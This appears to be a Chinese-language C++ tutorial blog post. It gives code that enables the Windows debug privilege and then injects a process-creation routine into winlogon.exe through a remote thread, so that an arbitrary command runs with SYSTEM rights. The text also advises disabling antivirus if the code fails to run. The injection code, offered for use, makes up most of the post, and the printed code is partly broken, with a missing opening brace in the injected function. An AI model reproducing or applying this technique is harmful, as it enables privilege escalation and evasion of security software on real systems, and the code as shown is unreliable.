作为C++方面的第一片文章,就先说说获取权限方面的东西吧!首先是获取DeBug权限(它是做其他进一步工作的基础),想必大家对这个方法应该很熟悉吧,网上有关这个的文章已经很多了,所以我就直接贴代码了!
代码
1 BOOL WINAPI EnterDebug()
2 {
3
4 HANDLE retokenhandle;
5 BOOL res = FALSE;
6 BOOL fOK = FALSE;
7 LUID tmpluid;
8 TOKEN_PRIVILEGES tkp;
9
10 __try
11 {
12
13 OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&retokenhandle);
14
15 if (retokenhandle == 0){__leave;}
16
17 res = LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tmpluid);
18
19 if (res == 0){__leave;}
20
21 tkp.PrivilegeCount = 1;
22 tkp.Privileges->Luid = tmpluid;
23 tkp.Privileges->Attributes = SE_PRIVILEGE_ENABLED;
24
25 res = AdjustTokenPrivileges(retokenhandle,FALSE,&tkp,0,0,0);
26
27 if (res == FALSE){__leave;}
28
29 fOK = TRUE;
30
31 }
32 __finally
33 {
34 if (retokenhandle != 0 ){CloseHandle(retokenhandle);}
35
36 }
37
38 return fOK;
39
40 }
41
42
好了,以上就是全过程,并且在 WindowsXP SP2 VC2008 下编译通过。如果无法运行,可以关掉杀毒软件再试试。
接下来要着重讲的是如何获取System权限,System权限也就是系统当中的最高权限,拥有所有特权。软件拥有了他可以干很多事!
现在比较流行的获取方式有两种,第一种是通过HOOK挂钩相应的API函数,从而在创建进程前修改其继承的进程,改为从有System权限的进程继承(如winlogon.exe)。第二种是通过远线程将创建进程的代码注入到winlogon.exe中,从而创建进程的是winlogon.exe,那么被创建的进程自然也有System权限了。
但两种方法都有缺点,第一种:要挂钩的函数在不同版本的操作系统中不同,所以通用性不强。第二种:因为用了远线程,所以容易被杀毒软件消灭。
在这里我先讲第二种方法,第一种我以后再讲。
在做以下工作之前一定要先获得DeBug权限。
代码
1 static struct MyData //定义远线程所需的参数结果
2 {
3 LPVOID addrCreateProcess;
4 LPVOID addrExitThread;
5 WCHAR wsCmdLine[MAX_PATH];
6 WCHAR stDesktop[16];
7 STARTUPINFO si;
8 LPPROCESS_INFORMATION ppinfo;
9
10 };
11
12 static void WINAPI RemoteFunction(MyData *pData);
13 static void WINAPI endFunction();
14
15 BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess);
16
17 HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName);
18
19 //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
20
21 static void WINAPI RemoteFunction(MyData *pData)//将要注入进程的代码。(必需要有static修饰)
22
23
24
25 typedef LONG (WINAPI *CREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCTSTR lpCurrentDirectory,LPSTARTUPINFO lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation );
26
27 CREATEPROCESS RemoteCreateProcess = (CREATEPROCESS)pData->addrCreateProcess;
28
29 pData->si.lpDesktop = (LPWSTR)&(pData->stDesktop);
30
31
32 RemoteCreateProcess(NULL,pData->wsCmdLine,NULL,NULL,TRUE,0,NULL,NULL,(LPSTARTUPINFO)&(pData->si),pData->ppinfo);
33
34 }
35
36 static void WINAPI endFunction()//上述函数的结束标志。(必需要有static修饰,且必需接在上面的函数之后)
37 {
38 }
39
40
41 BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess)//进行注入操作。
42 {
43
44 BOOL res = FALSE;
45 HANDLE hThread = 0;
46 UINT SizeOfFunction = 0;
47 LPVOID RemoteAddress = 0;
48
49 LPVOID ReDataAddress = 0;
50
51 LPVOID Reppinfo = 0;
52
53 MyData data = {0};
54 wcscpy_s(data.wsCmdLine ,CmdLines);
55 wcscpy_s(data.stDesktop,L"WinSta0\\Default");
56 data.si.cb = sizeof(STARTUPINFO);
57 data.si.dwFlags = 1;
58 data.si.wShowWindow = WinShow;
59
60 __try
61 {
62
63 data.addrCreateProcess = GetProcAddress(GetModuleHandle(L"kernel32.dll"),"CreateProcessW");
64 if (data.addrCreateProcess == 0)__leave;
65
66 data.addrExitThread = GetProcAddress(GetModuleHandle(L"kernel32.dll"),"ExitThread");
67 if (data.addrExitThread == 0)__leave;
68
69 //以上过程将远线程要调用的函数地址及参数全部通过MyData结构写入winlogon.exe的进程空间。
70
71 ////////////////////////////分配内存空间////////////////////////////////////////////
72 if (hProcess == 0)__leave;
73
74 SizeOfFunction = (UINT)endFunction - (UINT)RemoteFunction;
75 if (SizeOfFunction == 0)__leave;
76
77 RemoteAddress = VirtualAllocEx(hProcess,NULL,SizeOfFunction,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
78 if (RemoteAddress == 0)__leave;
79
80 if (!WriteProcessMemory(hProcess,RemoteAddress,(LPCVOID)RemoteFunction,SizeOfFunction,0))__leave;
81
82
83
84 Reppinfo = VirtualAllocEx(hProcess,NULL,sizeof(PROCESS_INFORMATION),MEM_COMMIT,PAGE_READWRITE);
85 if (Reppinfo == 0)__leave;
86
87 data.ppinfo = (LPPROCESS_INFORMATION)Reppinfo;
88
89 ReDataAddress = VirtualAllocEx(hProcess,NULL,sizeof(data),MEM_COMMIT,PAGE_READWRITE);
90 if (ReDataAddress == 0)__leave;
91
92 if (!WriteProcessMemory(hProcess,ReDataAddress,&data,sizeof(data),0))__leave;
93
94
95
96
97 //////////////////////////创建远线程//////////////////////////////////////////////////
98
99 hThread = CreateRemoteThread(hProcess,NULL,NULL,(PTHREAD_START_ROUTINE)RemoteAddress,ReDataAddress,NULL,NULL);
100 if (hThread == 0)__leave;
101
102 WaitForSingleObject(hThread,INFINITE);
103
104 res = TRUE;
105
106 }
107 __finally
108 {
109
110 if (RemoteAddress != 0){ VirtualFreeEx(hProcess,RemoteAddress,0,MEM_RELEASE);}
111
112 if (ReDataAddress != 0){ VirtualFreeEx(hProcess,ReDataAddress,0,MEM_RELEASE);}
113
114 if (Reppinfo != 0){ VirtualFreeEx(hProcess,Reppinfo,0,MEM_RELEASE);}
115
116 if (hThread != 0){ CloseHandle(hThread);}
117
118 if (hProcess != 0){ CloseHandle(hProcess);}
119
120 }
121
122 return res;
123 }
124
125
126 //下面这个函数不是必要的,我只是通过它来获得winlogon.exe的进程句柄。
127
128 HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName)
129 {
130
131 BOOL fOK = FALSE;
132 DWORD ProcIDs[1024] = {0};
133 DWORD dwLengthOfProc = 0;
134 HANDLE hp = NULL;
135 DWORD nSize = 0;
136
137 fOK = EnumProcesses(ProcIDs,sizeof(ProcIDs),&dwLengthOfProc);
138 if (fOK == FALSE){return 0;}
139
140 for(DWORD i = 0;i<(dwLengthOfProc/sizeof(DWORD));i++)
141 {
142 hp = OpenProcess(dwDesiredAccess,bInheritHandle,ProcIDs[i]);
143 if (hp == NULL)continue;
144
145 WCHAR wcFilePath[MAX_PATH] = {0};
146 nSize = GetModuleFileNameEx(hp,0,wcFilePath,MAX_PATH);
147 if (nSize == 0)
148 {
149 CloseHandle(hp);
150 continue;
151 }
152
153 if (_wcsicmp(&wcFilePath[nSize - wcslen(wcProcessName)],wcProcessName) == 0)
154 {
155 return hp;
156 }
157
158 CloseHandle(hp);
159
160 }
161
162 return 0;
163
164 }
165
